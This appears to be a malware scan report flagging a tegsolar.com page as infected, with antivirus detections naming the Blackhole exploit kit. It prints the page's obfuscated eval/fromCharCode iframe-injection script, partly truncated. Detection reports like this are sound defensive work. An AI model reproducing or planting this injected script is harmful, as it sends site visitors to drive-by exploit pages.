- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_005.htm | 200 OK Content-Length: 10208 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Sun, 14 Sep 2014 20:49:42 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html
| clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10669 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://www.tegsolar.com/../js/selectBox/jquery.selectBox.min.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |